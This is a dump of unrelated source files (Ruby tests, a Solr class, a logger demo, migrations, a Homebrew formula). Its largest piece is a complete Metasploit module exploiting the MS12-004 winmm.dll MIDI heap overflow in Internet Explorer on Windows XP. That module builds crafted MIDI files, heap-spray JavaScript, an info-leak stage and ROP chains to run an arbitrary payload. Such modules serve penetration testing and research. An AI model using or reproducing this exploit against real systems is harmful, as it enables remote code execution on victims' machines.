s1 = Taxon.make!( rank: Taxon::SPECIES )
o = Observation.make!( taxon: @Calypte_anna )
Identification.make!( observation: o, taxon: @Calypte_anna )
i = Identification.make!( observation: o, taxon: s1 )
expect( i.disagreement ).to be_nil
end
end
end
describe Identification, "set_previous_observation_taxon" do
elastic_models( Observation )
it "should choose the observation taxon by default" do
o = Observation.make!( taxon: Taxon.make!(:species) )
t = Taxon.make!(:species)
3.times { Identification.make!( observation: o, taxon: t ) }
o.reload
previous_observation_taxon = o.taxon
i = Identification.make!( observation: o )
expect( i.previous_observation_taxon ).to eq previous_observation_taxon
end
it "should choose the probable taxon if the observer has opted out of the community taxon" do
o = Observation.make!( taxon: Taxon.make!(:species), prefers_community_taxon: false )
t = Taxon.make!(:species)
3.times { Identification.make!( observation: o, taxon: t ) }
o.reload
previous_observation_probable_taxon = o.probable_taxon
i = Identification.make!( observation: o )
expect( i.previous_observation_taxon ).to eq previous_observation_probable_taxon
end
it "should set it to the observer's previous identicication taxon if they are the only identifier" do
genus = Taxon.make!( rank: Taxon::GENUS )
species = Taxon.make!( rank: Taxon::SPECIES, parent: genus )
o = Observation.make!( taxon: species )
i1 = o.identifications.first
o.reload
expect( i1 ).to be_persisted
i2 = Identification.make!( observation: o, taxon: genus, user: i1.user )
expect( i2.previous_observation_taxon ).to eq i1.taxon
end
it "should not consider set a previous_observation_taxon to the identification taxon" do
family = Taxon.make!( rank: Taxon::FAMILY )
genus = Taxon.make!( rank: Taxon::GENUS, parent: family, name: "Homo" )
species = Taxon.make!(:species, parent: genus, name: "Homo sapiens" )
o = Observation.make!
i1 = Identification.make!( observation: o, taxon: genus )
i2 = Identification.make!( observation: o, taxon: species )
o.reload
expect( o.probable_taxon ).to eq species
o.reload
i3 = Identification.make!( observation: o, taxon: genus, user: i2.user, disagreement: true )
expect( i3.previous_observation_taxon ).to eq species
end
it "should not happen when you restore a withdrawn ident" do
genus = Taxon.make!( rank: Taxon::GENUS, name: "Genus" )
species1 = Taxon.make!( rank: Taxon::SPECIES, parent: genus, name: "Genus speciesone" )
species2 = Taxon.make!( rank: Taxon::SPECIES, parent: genus, name: "Genus speciestwo" )
o = Observation.make!( taxon: species1 )
i = Identification.make!( observation: o, taxon: genus, disagreement: true )
expect( i.previous_observation_taxon ).to eq species1
expect( o.taxon ).to eq genus
i.update_attributes( current: false )
o.reload
expect( o.taxon ).to eq species1
i2 = Identification.make!( observation: o, user: o.user, taxon: species2 )
expect( o.taxon ).to eq species2
i.update_attributes( current: true )
expect( i.previous_observation_taxon ).to eq species1
end
end
describe Identification, "update_disagreement_identifications_for_taxon" do
elastic_models( Observation )
let(:f) { Taxon.make!( rank: Taxon::FAMILY ) }
let(:g1) { Taxon.make!( rank: Taxon::GENUS, parent: f ) }
let(:g2) { Taxon.make!( rank: Taxon::GENUS, parent: f ) }
let(:s1) { Taxon.make!( rank: Taxon::SPECIES, parent: g1 ) }
describe "should set disagreement to false" do
it "when identification taxon becomes a descendant of the previous observation taxon" do
t = Taxon.make!( rank: Taxon::SPECIES, parent: g2 )
o = Observation.make!( taxon: g1 )
i = Identification.make!( taxon: t, observation: o )
expect( i.previous_observation_taxon ).to eq g1
expect( i ).to be_disagreement
without_delay { t.update_attributes( parent: g1 ) }
i.reload
expect( i ).not_to be_disagreement
end
it "when previous observation taxon becomes an ancestor of the identification taxon" do
t = Taxon.make!( rank: Taxon::GENUS, parent: f )
o = Observation.make!( taxon: t )
i = Identification.make!( taxon: s1, observation: o )
expect( i.previous_observation_taxon ).to eq t
expect( i ).to be_disagreement
without_delay { s1.update_attributes( parent: t ) }
i.reload
expect( i ).not_to be_disagreement
end
end
end
| 40.850733 | 144 | 0.690069 |
1c405885e26d2f212ca1a7d201bd12ed80e4e270 | 859 | # The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'rexml/xpath'
class Solr::Response::Ping < Solr::Response::Xml
def initialize(xml)
super
@ok = REXML::XPath.first(@doc, './solr/ping') ? true : false
end
# returns true or false depending on whether the ping
# was successful or not
def ok?
@ok
end
end
| 29.62069 | 74 | 0.725262 |
ab71fe767d2de37a7969fda3e22b55aa806446e0 | 705 | #!/usr/bin/ruby
# encoding: UTF-8
# require 'pyer/logger'
require './lib/pyer/logger.rb'
log = Logger.new(STRING, self.class)
log.debug 'StringIO'
log.close
print log.string
log = Logger.new(STDOUT, self.class)
log.debug 'debug'
log.info 'information'
log.info('what ?') { 'glop ' * 2 }
log.warn 'warning'
log.error 'error'
log.close
puts 'Formatter:'
f = Pyer::Formatter.new
puts f.string('KLASS', 'VOID')
puts f.string('KLASS', 'LABEL', 'message')
class Sample
def logging
log = Logger.new(STDOUT, self.class)
log.level = Logger::WARN
log.debug 'debug'
log.info 'information'
log.warn 'level is WARN'
log.error 'error'
log.close
end
end
s = Sample.new
s.logging
| 18.552632 | 42 | 0.670922 |
bb80a26bb0f34b7d4695a2f5060888a6a587eb9f | 102 | # frozen_string_literal: true
module ChatPreview
class ChatPreview < ApplicationComponent; end
end
| 17 | 47 | 0.823529 |
f7b9702c894959c24ac92405d3d345ae9b22f6e9 | 262 | class ChangeMatchsetsAndPicksSpec < ActiveRecord::Migration[5.0]
def change
add_column :matchsets, :name, :string
add_column :matchsets, :difficulty, :string
add_column :matchsets, :level, :string
remove_column :matchsets, :song_name
end
end
| 29.111111 | 64 | 0.744275 |
7901953a3d0b28337ef74cd2417aa8b81b46fb45 | 124 | json.extract! github_news_item, :id, :created_at, :updated_at
json.url github_news_item_url(github_news_item, format: :json) | 62 | 62 | 0.822581 |
385dda428d8fed5a32f636e1871bec9c1215c476 | 131 | require 'vcr'
VCR.configure do |c|
c.cassette_library_dir = 'spec/vcr'
c.hook_into :webmock
c.configure_rspec_metadata!
end
| 16.375 | 37 | 0.748092 |
334e45c66ecff069a21e20e871d6c090bad24ac2 | 18,659 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
'Name' => "MS12-004 midiOutPlayNextPolyEvent Heap Overflow",
'Description' => %q{
This module exploits a heap overflow vulnerability in the Windows Multimedia
Library (winmm.dll). The vulnerability occurs when parsing specially crafted
MIDI files. Remote code execution can be achieved by using the Windows Media Player
ActiveX control.
Exploitation is done by supplying a specially crafted MIDI file with
specific events, causing the offset calculation being higher than what is
available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing
us to either "inc al" or "dec al" a byte. This can be used to corrupt an array
(CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects,
which leverages remote code execution under the context of the user.
Note: At this time, for IE 8 target, msvcrt ROP is used by default. However,
if you know your target's patch level, you may also try the 'MSHTML' advanced
option for an info leak based attack. Currently, this module only supports two
MSHTML builds: 8.0.6001.18702, which is often seen in a newly installed XP SP3.
Or 8.0.6001.19120, which is patch level before the MS12-004 fix.
Also, based on our testing, the vulnerability does not seem to trigger when
the victim machine is operated via rdesktop.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Shane Garrett', #Initial discovery (IBM X-Force)
'juan vazquez',
'sinn3r'
],
'References' =>
[
[ 'MSB', 'MS12-004'],
[ 'CVE', '2012-0003' ],
[ 'OSVDB', '78210'],
[ 'BID', '51292']
],
'Payload' =>
{
'Space' => 1024
},
'DefaultOptions' =>
{
'EXITFUNC' => "process",
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[
'IE 6 on Windows XP SP3',
{
'Rop' => false,
'DispatchDst' => 0x0c0c0c0c
}
],
[
'IE 7 on Windows XP SP3',
{
'Rop' => false,
'DispatchDst' => 0x0c0c0c0c
}
],
[
'IE 8 on Windows XP SP3',
{
# xchg ecx,esp
# or byte ptr [eax],al
# add byte ptr [edi+5Eh],bl
# ret 8
# From IMAGEHLP
'Rop' => true,
'StackPivot' => 0x76C9B4C2,
'DispatchDst' => 0x0c0c1bd0
}
]
],
'Privileged' => false,
'DisclosureDate' => '2012-01-10',
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
])
register_advanced_options(
[
OptEnum.new('MSHTML',
[
false, "MSHTML Build Version", '',
[
'', #Default (no leaky leaky)
'8.0.6001.18702', #newly installed Win XP SP3 non patched
'8.0.6001.19120' #fully patched before KB2598479 - been the same at least since Sep 2011
]
])
])
end
def exploit
@m_name, @midi = get_midi
@ml_name, @midi_leak = get_midi("leak")
@second_stage_url = rand_text_alpha(10)
@leak_param = rand_text_alpha(5)
# Offset to CFunctionPointer vftable in MSHTML
case datastore['MSHTML']
when '8.0.6001.18702'
@offset = 0xbf190
when '8.0.6001.19120'
@offset = 0xd92c8
end
super
end
def get_target(request)
agent = request.headers['User-Agent']
print_status("Request as: #{agent}")
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
#Windows XP SP3 + IE 6.0
return targets[1]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
#Windows XP SP3 + IE 7.0
return targets[2]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
#Windows XP SP3 + IE 8.0
return targets[3]
else
return nil
end
end
# stage => "corruption" (default) | "leak"
def get_midi(stage="corruption")
# MIDI Fileformat Reference:
# http://www.sonicspot.com/guide/midifiles.html
#
# Event Types:
# 0x08 = Note Off (when MIDI key is released)
# 0x09 = Note On (when MIDI key is pressed)
# 0x0A = Note aftertouch (pressure change on the pressed MIDI key)
# 0x0B = Controller Event (MIDI channels state)
# 0x0C = Program change (Which instrument/patch should be played on the MIDI channel)
    # 0x0D = Channel aftertouch (similar to Note Aftertouch; affects all keys pressed on the specific MIDI channel)
    # 0x0E = Pitch Bend (similar to a controller event; has 2 bytes to describe its value)
# 0x0F = Meta Events (not sent or received over a midi port)
# Structure:
# [Header Chunk][Track Chunk][Meta Event][Meta Event][SYSEX Event][Midi Channel Event)
# Track Chunk Data
tc = "\x00\xFF\x03\x0D\x44\x72\x75\x6D"
# Meta Event - Sequence/Track Name
tc << "\x73\x20\x20\x20\x28\x42\x42\x29\x00"
# Midi Channel Event - Program Change
tc << "\x00\xC9\x28"
# Midi Channel Event - Controller
tc << "\x00\xB9\x07\x64"
# Midi Channel Event - Controller
tc << "\x00\xB9\x0A\x40"
# Midi Channel Event - Controller
tc << "\x00\xB9\x7B\x00"
# Midi Channel Event - Controller
tc << "\x00\xB9\x5B\x28"
# Midi Channel Event - Controller
tc << "\x00\xB9\x5D\x00"
# Midi Channel Event - Note On
tc << "\x85\x50\x99\x23\x7F"
# Corruption events
if stage == "corruption"
# Midi Channel Event - Note On
tc << "\x00\x9F\xb2\x73"
else
# Midi Channel Event - Note Off (trigger a leak)
tc << "\x00\x8F\xb2\x73"
end
# Meta Event - End Of Track
tc << "\x00\xFF\x2F\x00"
m = ''
# HEADERCHUNK Header
m << "MThd" # Header
m << "\x00\x00\x00\x06" # Chunk size
m << "\x00\x00" # Format Type
m << "\x00\x01" # Number of tracks
m << "\x00\x60" # Time division
# TRACKCHUNK header
m << "MTrk" # Header
m << [tc.length].pack('N')
m << tc
#midi_name = "test_case.mid"
midi_name = rand_text_alpha(5) + ".mid"
return midi_name, m
end
def on_request_uri(cli, request)
# Initialize a target. If none suitable, then we don't continue.
my_target = target
if my_target.name =~ /Automatic/
my_target = get_target(request)
agent = request.headers['User-Agent']
if my_target.nil? and agent !~ /Windows\-Media\-Player|NSPlayer/
send_not_found(cli)
print_error("Unknown user-agent")
return
end
vprint_status("Target selected: #{my_target.name}") if not my_target.nil?
end
# Send the corrupt midi file to trigger a memory leak, or a crash to that points
# to an arbitrary address.
if request.uri =~ /#{@ml_name}$/i
print_status("Testing for info leak...")
      send_response(cli, @midi_leak, {'Content-Type'=>'application/octet-stream'})
return
elsif request.uri =~ /#{@m_name}$/i
print_status("Sending midi corruption file...")
      send_response(cli, @midi, {'Content-Type'=>'application/octet-stream'})
return
end
# Send the appropriate stage
if datastore['MSHTML'].to_s != '' and my_target['Rop']
if request.uri =~ /#{@second_stage_url}/
leak = begin
request.uri_parts["QueryString"][@leak_param].to_i
rescue
0
end
print_status("Leaked address: 0x#{leak.to_s(16)}")
send_stage(cli, my_target, 'trigger', leak)
return
end
send_stage(cli, my_target, 'leak')
else
send_stage(cli, my_target)
end
end
def send_stage(cli, my_target, stage='trigger', leak=0)
midi_uri = get_resource.chomp("/")
if stage == 'leak'
midi_uri << "/#{@ml_name}"
trigger = build_trigger(my_target, "leak")
else
midi_uri << "/#{@m_name}"
trigger = build_trigger(my_target)
spray = build_spray(my_target, leak)
end
if datastore['OBFUSCATE']
spray = ::Rex::Exploitation::JSObfu.new(spray).obfuscate(memory_sensitive: true)
trigger = ::Rex::Exploitation::JSObfu.new(trigger)
trigger.obfuscate(memory_sensitive: true)
trigger_fn = trigger.sym('trigger')
else
trigger_fn = 'trigger'
end
html = %Q|
<html>
<head>
<script language='javascript'>
#{spray}
</script>
<script language='javascript'>
#{trigger}
</script>
<script for=audio event=PlayStateChange(oldState,newState)>
if (oldState == 3 && newState == 0) {
#{trigger_fn}();
}
</script>
</head>
<body>
<object ID="audio" WIDTH=1 HEIGHT=1 CLASSID="CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95">
<param name="fileName" value="#{midi_uri}">
<param name="SendPlayStateChangeEvents" value="true">
<param NAME="AutoStart" value="True">
<param name="uiMode" value="mini">
<param name="Volume" value="-300">
</object>
</body>
</html>
|
html = html.gsub(/^ {4}/, '')
print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
def build_spray(my_target, leak=0)
# Extract string based on target
if my_target.name == 'IE 8 on Windows XP SP3'
js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"
else
js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
end
# Build shellcode based on Rop requirement
code = ''
if my_target['Rop'] and datastore['MSHTML'].to_s != ''
print_status("Generating ROP using info-leak: 0x#{leak.to_s(16)}")
code << create_info_leak_rop(my_target, leak)
code << payload.encoded
elsif my_target['Rop'] and datastore['MSHTML'].to_s == ''
print_status("Generating ROP using msvcrt")
code << create_rop(my_target, payload.encoded)
else
code << payload.encoded
end
shellcode = Rex::Text.to_unescape(code)
randnop = rand_text_alpha(rand(100) + 1)
js_nops = Rex::Text.to_unescape("\x0c"*4)
# 1. Create big block of nops
# 2. Compose one block which is nops + shellcode
# 3. Repeat the block
# 4. Extract string from the big block
# 5. Spray
spray = <<-JS
var heap_obj = new heapLib.ie(0x10000);
var code = unescape("#{shellcode}");
var #{randnop} = "#{js_nops}";
var nops = unescape(#{randnop});
while (nops.length < 0x1000) nops+= nops;
var shellcode = nops.substring(0,0x800 - code.length) + code;
while (shellcode.length < 0x40000) shellcode += shellcode;
#{js_extract_str}
heap_obj.gc();
for (var i=0; i < 600; i++) {
heap_obj.alloc(block);
}
JS
spray = heaplib(spray, {:noobfu => true})
return spray
end
# Build the JavaScript string for the attributes
# type => "corruption" (default) | "leak"
def build_element(element_name, my_target, type="corruption")
dst = Rex::Text.to_unescape([my_target['DispatchDst']].pack("V"))
element = ''
if my_target.name =~ /IE 8/
max = 63 # Number of attributes for IE 8
index = 1 # Where we want to confuse the type
else
max = 55 # Number of attributes for before IE 8
index = 0 # Where we want to confuse the type
end
element << "var #{element_name} = document.createElement(\"select\")" + "\n"
# Build attributes
0.upto(max) do |i|
case type
when "corruption"
obj = (i==index) ? "unescape(\"#{dst}\")" : "alert"
else #leak
obj = "alert"
end
element << "#{element_name}.w#{i.to_s} = #{obj}" + "\n"
end
return element
end
# Feng Shui and triggering Steps:
# 1. Run the garbage collector before allocations
# 2. Defragment the heap and alloc CImplAry objects in one step (objects size are IE version dependent)
# 3. Make holes
# 4. Let windows media play the crafted midi file and corrupt the heap
# 5. Force the using of the confused tagVARIANT.
def build_trigger(my_target, type="corruption")
js_trigger = build_trigger_fn(my_target, type)
select_element = build_element('selob', my_target, type)
trigger = <<-JS
var heap = new heapLib.ie();
#{select_element}
var clones = new Array(1000);
function feng_shui() {
heap.gc();
var i = 0;
while (i < 1000) {
clones[i] = selob.cloneNode(true)
i = i + 1;
}
var j = 0;
while (j < 1000) {
delete clones[j];
CollectGarbage();
j = j + 2;
}
}
feng_shui();
#{js_trigger}
JS
trigger = heaplib(trigger, {:noobfu => true})
return trigger
end
# type = "corruption" (default) | "leak"
def build_trigger_fn(my_target, type="corruption")
js_trigger=""
case type
when "corruption"
js_trigger = js_trigger_fn_corruption(my_target)
when "leak"
js_trigger = js_trigger_fn_leak(my_target)
end
return js_trigger
end
# Redoing the feng shui if fails makes it reliable
def js_trigger_fn_corruption(my_target)
attribute = (my_target.name == 'IE 8 on Windows XP SP3') ? 'w1' : 'w0'
js = %Q|
function trigger(){
var k = 999;
while (k > 0) {
if (typeof(clones[k].#{attribute}) == "string") {
} else {
clones[k].#{attribute}('come on!');
}
k = k - 2;
}
feng_shui();
document.audio.Play();
}
|
return js
end
# Redoing the feng shui if fails makes it reliable
def js_trigger_fn_leak(my_target)
js_trigger = ""
if my_target.name == 'IE 8 on Windows XP SP3'
js_trigger = <<-JSTRIGGER
function trigger(){
var k = 999;
while (k > 0) {
if (typeof(clones[k].w1) == "string") {
var leak = clones[k].w1.charCodeAt(1)*0x10000 + clones[k].w1.charCodeAt(0)
document.location = "#{get_resource.chomp("/")}/#{@second_stage_url}" + "?#{@leak_param}=" + leak
return;
}
k = k - 2;
}
feng_shui();
document.audio.Play();
}
JSTRIGGER
end
return js_trigger
end
def create_rop(t, p)
# MSVCRT.dll ROP
padding = ''
padding << [0x77C4CA70].pack("V*") #ADD ESP,0C; RET
padding << [t['StackPivot']].pack("V*")
padding << [0x77C4CA73].pack("V*") * 12 #ROP NOPs
generate_rop_payload('msvcrt', p, {'pivot'=>padding, 'target'=>'xp'})
end
def create_info_leak_rop(my_target, leak = 0x0)
base = (leak == 0x00) ? 0x63580000 : (leak - @offset)
print_status("Image base of mshtml: 0x%x" %base)
# Generate the gadgets based on offset
rop_gadgets = ''
case @offset
when 0xd92c8
rop_gadgets =
[
:junk,
:junk,
0x328468, # push ecx # pop esp # pop edi # pop esi # pop ebp # retn 14
:junk,
0x247e5d, # ROP NOPs
0x247e5d,
0x247e5d,
0x247e5d,
0x247e5d,
0x247e5d,
0x247e5d,
0x247e5c, # POP ESI # RETN [mshtml.dll]
0x137c, # ptr to &VirtualProtect() [IAT mshtml.dll]
0x3c8db7, # MOV EDX,DWORD PTR DS:[ESI] # ADD EAX,8BCE8B00 # RETN [mshtml.dll]
0x42e239, # PUSH EDX # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x08 [mshtml.dll]
:junk,
0x3460c, # POP EBP # RETN [mshtml.dll]
:junk,
:junk,
0x23ef79, # & jmp esp [mshtml.dll]
0x189303, # POP EBX # RETN [mshtml.dll]
:ebx, # 0x00000201-> ebx
0x20437c, # POP EDX # RETN [mshtml.dll]
:edx, # 0x00000040-> edx
0xc277, # POP ECX # RETN [mshtml.dll]
0x53a47d, # &Writable location [mshtml.dll]
0x4a33e2, # POP EDI # RETN [mshtml.dll]
0x4b601, # RETN (ROP NOP) [mshtml.dll]
0x33fbc6, # POP EAX # RETN [mshtml.dll]
:nop,
0x52c718 # PUSHAD # RETN [mshtml.dll]
]
when 0xbf190
rop_gadgets =
[
:junk,
0x3338ae, # push ecx # pop esp # pop edi # pop esi # pop ebp # retn 14
:junk,
0xe9e7, # POP ECX # RETN [mshtml.dll] 0x6358e9e7
:junk,
:junk,
:junk,
:junk,
:junk,
0x1318, # ptr to &VirtualProtect() [IAT mshtml.dll]
0x48b440, # MOV EDX,DWORD PTR DS:[ECX] # RETN [mshtml.dll]
0x3dc745, # POP ESI # RETN [mshtml.dll]
:neg, # 0xffffffff
0x2fb18b, # INC ESI # RETN [mshtml.dll]
0x35190d, # ADC ESI,EDX # DEC ECX # RETN 08 [mshtml.dll]
0x4aada7, # POP EBP # RETN [mshtml.dll]
:junk, # Compensates RETN
:junk, # Compensates RETN
0x1ffc54, # & jmp esp [mshtml.dll]
0x4498a7, # POP EBX # RETN [mshtml.dll]
:ebx, # 0x00000800: 0x00000201-> ebx
0x24cce4, # POP EDX # RETN [mshtml.dll]
:edx, # 0x00000040-> edx
0x158306, # POP ECX # RETN [mshtml.dll]
0x535098, # &Writable location [mshtml.dll]
0x1cf217, # POP EDI # RETN [mshtml.dll]
0xa0001, # RETN (ROP NOP) [mshtml.dll]
0x349f9b, # POP EAX # RETN [mshtml.dll]
:nop,
0x2afbe8 # PUSHAD # RETN [mshtml.dll]
]
end
nops = make_nops(4).unpack("L")[0].to_i
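    # Resolve the placeholder symbols (:junk, :neg, :ebx, :edx, :nop) to concrete 32-bit values
    # and rebase the remaining numeric gadget offsets against the mshtml image base.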
rop_gadgets.map! { |e|
if e == :junk
rand_text(4).unpack("L")[0].to_i
elsif e == :neg
0xffffffff
elsif e == :ebx
0x00000800
elsif e == :edx
0x00000040
elsif e == :nop
nops
else
base + e
end
}
chain = rop_gadgets.pack('V*')
return chain
end
end
| 30.588525 | 115 | 0.567072 |
088d302304863883b30858d2c767ea1d06e26d2c | 244 | require 'test_helper'
class RoutesTest < ActionDispatch::IntegrationTest
# why does this not work?
# test "pages routes" do
# assert_recognizes({:controller => "static_pages/pages", :action => "show"}, {:path => "test"})
# end
end
| 22.181818 | 100 | 0.67623 |
0871e2e917dae76dd8a9c81606ea83544aa81b4e | 354 | class FontEuphoriaScript < Formula
head "https://github.com/google/fonts/raw/main/ofl/euphoriascript/EuphoriaScript-Regular.ttf", verified: "github.com/google/fonts/"
desc "Euphoria Script"
homepage "https://fonts.google.com/specimen/Euphoria+Script"
def install
(share/"fonts").install "EuphoriaScript-Regular.ttf"
end
test do
end
end
| 32.181818 | 133 | 0.757062 |
6108bda083d0c2d22c8282a962dcdd4fd6758d07 | 1,065 | class AddProducts < ActiveRecord::Migration[6.0]
def change
Product.create ({ :title => "Salons",
:description => "This is Hawaiian pizza",
:price => 350, :size => 30,
:is_spicy => false,
:is_veg => false,
:is_best_offer => false,
:path_to_image => '/images/par.jpg' })
Product.create ({ :title => "Individuals",
:description => "This is Pepperoni pizza",
:price => 450, :size => 30,
:is_spicy => false,
:is_best_offer => false,
:is_veg => false,
:path_to_image => '/images/s.jpg' })
Product.create ({ :title => "The map",
:description => "This is Vegeterian pizza",
:price => 400, :size => 30,
:is_spicy => false,
:is_veg => true ,
:is_best_offer => false,
:path_to_image => '/images/map.jpg' })
end
end
| 38.035714 | 62 | 0.435681 |
5d79ae48342b467fd661121ee15c0c7c1d7c2679 | 680 | module Intrigue
module Ident
module Check
class Cerberus < Intrigue::Ident::Check::Base
def generate_checks(url)
[
{
:type => "fingerprint",
:category => "application",
:tags => ["Web Server"],
:vendor => "Cradlepoint",
:product =>"HTTP Service",
:match_details =>"server header",
:version => nil,
:match_type => :content_headers,
:match_content => /^server:.*Cerberus.*$/,
:dynamic_version => lambda{ |x|
_first_header_capture(x,/^server:.*Cerberus\/([\d\.]*)\s.*$/i)
},
:paths => ["#{url}"],
:inference => true
}
]
end
end
end
end
end
| 21.935484 | 73 | 0.526471 |
bb780ae254fed522923abc2e53d5a7e7a7fddcf9 | 3,400 | class Tinyxml < Formula
desc "XML parser"
homepage "http://www.grinninglizard.com/tinyxml/"
url "https://downloads.sourceforge.net/project/tinyxml/tinyxml/2.6.2/tinyxml_2_6_2.tar.gz"
sha256 "15bdfdcec58a7da30adc87ac2b078e4417dbe5392f3afb719f9ba6d062645593"
revision 1 unless OS.mac?
bottle do
sha256 cellar: :any, arm64_big_sur: "04fccb4076db86eb901b710f5d50b01ea6e6cec907979aed5eb5135c9654e16d"
sha256 cellar: :any, big_sur: "e98aaca0d889c322b5e2294495e7613e656773fb5f605a6239d8b85949011b99"
sha256 cellar: :any, catalina: "7cc1ada5d273bec9f50a1809a9989306ec9601a037c06b362cee321fbdc5c0a7"
sha256 cellar: :any, mojave: "c1fc1d7fa9e6934412294e921cde90bcfd107b68dbdddd9acf8cae4927190718"
sha256 cellar: :any, high_sierra: "ec0f83018a9ff93c11b6a8c92483056b2771359a14aedfb6dc46e1ab078ce9ac"
sha256 cellar: :any, sierra: "ef8c7bbbae6148e161b6f3369ede8bd3533a32847dc716000b46d26e6fb1c26c"
sha256 cellar: :any, el_capitan: "16e6052892b43e68c45f5122b6802e9bc32001dc9478dfcd89511a24544660e5"
sha256 cellar: :any, yosemite: "4b1df9cb229b04f9968621a52737d96e86fcd6c2ad8904ae8a5c324347845f50"
sha256 cellar: :any, x86_64_linux: "58b44f9ef1275fa22bd9d907a2f4bb59d8de971ff514664c3e7157ebc4ac944d" # linuxbrew-core
end
depends_on "cmake" => :build
# The first two patches are taken from the debian packaging of tinyxml.
# The first patch enforces use of stl strings, rather than a custom string type.
# The second patch is a fix for incorrect encoding of elements with special characters
# originally posted at https://sourceforge.net/p/tinyxml/patches/51/
# The third patch adds a CMakeLists.txt file to build a shared library and provide an install target
# submitted upstream as https://sourceforge.net/p/tinyxml/patches/66/
patch do
url "https://raw.githubusercontent.com/robotology/yarp/59eedfbaa1069aa5f03a4a9980d984d59decd55c/extern/tinyxml/patches/enforce-use-stl.patch"
sha256 "16a5b5e842eb0336be606131e5fb12a9165970f7bd943780ba09df2e1e8b29b1"
end
patch do
url "https://raw.githubusercontent.com/robotology/yarp/59eedfbaa1069aa5f03a4a9980d984d59decd55c/extern/tinyxml/patches/entity-encoding.patch"
sha256 "c5128e03933cd2e22eb85554d58f615f4dbc9177bd144cae2913c0bd7b140c2b"
end
patch do
url "https://gist.githubusercontent.com/scpeters/6325123/raw/cfb079be67997cb19a1aee60449714a1dedefed5/tinyxml_CMakeLists.patch"
sha256 "32160135c27dc9fb7f7b8fb6cf0bf875a727861db9a07cf44535d39770b1e3c7"
end
def install
system "cmake", ".", *std_cmake_args
system "make", "install"
(lib+"pkgconfig/tinyxml.pc").write pc_file
end
def pc_file
<<~EOS
prefix=#{opt_prefix}
exec_prefix=${prefix}
libdir=${exec_prefix}/lib
includedir=${prefix}/include
Name: TinyXml
Description: Simple, small, C++ XML parser
Version: #{version}
Libs: -L${libdir} -ltinyxml
Cflags: -I${includedir}
EOS
end
test do
(testpath/"test.xml").write <<~EOS
<?xml version="1.0" ?>
<Hello>World</Hello>
EOS
(testpath/"test.cpp").write <<~EOS
#include <tinyxml.h>
int main()
{
TiXmlDocument doc ("test.xml");
doc.LoadFile();
return 0;
}
EOS
system ENV.cxx, "test.cpp", "-L#{lib}", "-ltinyxml", "-o", "test"
system "./test"
end
end
| 40.963855 | 145 | 0.743235 |
ed144935bf64a6235219772f2850f605c30ed22c | 196 | class AddAuthenticationTokenToUsers < ActiveRecord::Migration[5.0]
def change
add_column :users, :auth_token, :string, default: ''
add_index :users, :auth_token, unique: true
end
end
| 28 | 66 | 0.734694 |
4a9394563536f0df7a00952ec6472096e3934df6 | 1,557 | class Mednafen < Formula
desc "Multi-system emulator"
homepage "https://mednafen.github.io/"
url "https://mednafen.github.io/releases/files/mednafen-1.27.1.tar.xz"
sha256 "f3a89b2f32f40c3232593808d05e0c21cbdf443688ace04c9c27e4cf4d5955fb"
license "GPL-2.0-or-later"
livecheck do
url "https://mednafen.github.io/releases/"
regex(/href=.*?mednafen[._-]v?(\d+(?:\.\d+)+)\.t/i)
end
bottle do
sha256 arm64_big_sur: "89eb1006849d1d949b425d2937a7ca6e00c703a1edae563075dba88ccc817a0c"
sha256 big_sur: "5d671db565de9ce937475c19880caf88d38faa2b2b8a42888230a0be27f32615"
sha256 catalina: "beda51be33761b5b9e9764093e313b567d1b1bcd58aab91a64d3f7a4099d2c93"
sha256 mojave: "62500c988c009c14e45f80de2f69d3b9a352946a36888adfe94b4eda14e6fc9f"
sha256 x86_64_linux: "9385785347f0e28b221bc0d8dc0a6afbcab5eeda7664bbfc749cbafc8a8d75b6"
end
depends_on "pkg-config" => :build
depends_on "gettext"
depends_on "libsndfile"
depends_on macos: :sierra # needs clock_gettime
depends_on "sdl2"
uses_from_macos "zlib"
on_linux do
depends_on "mesa"
depends_on "mesa-glu"
end
def install
system "./configure", "--prefix=#{prefix}", "--disable-dependency-tracking"
system "make", "install"
end
test do
# Test fails on headless CI: Could not initialize SDL: No available video device
on_linux do
return if ENV["HOMEBREW_GITHUB_ACTIONS"]
end
cmd = "#{bin}/mednafen | head -n1 | grep -o '[0-9].*'"
assert_equal version.to_s, shell_output(cmd).chomp
end
end
| 31.77551 | 92 | 0.734104 |
6ad19888d59bbc832bfd4c16e6592348080ac8de | 2,767 | require 'test_helper'
class TwoPoolToSemiGenerationTest < ActionDispatch::IntegrationTest
def setup
create_pool_tournament_single_weight(8)
end
test "Match generation works" do
assert @tournament.matches.count == 16
assert @tournament.matches.select{|m| m.bracket_position == "Semis"}.count == 2
assert @tournament.matches.select{|m| m.bracket_position == "1/2"}.count == 1
assert @tournament.matches.select{|m| m.bracket_position == "3/4"}.count == 1
assert @tournament.matches.select{|m| m.bracket_position == "Pool"}.count == 12
assert @tournament.weights.first.pools == 2
end
test "Seeded wrestlers go to correct pool" do
guy1 = get_wrestler_by_name("Test1")
guy2 = get_wrestler_by_name("Test2")
guy3 = get_wrestler_by_name("Test3")
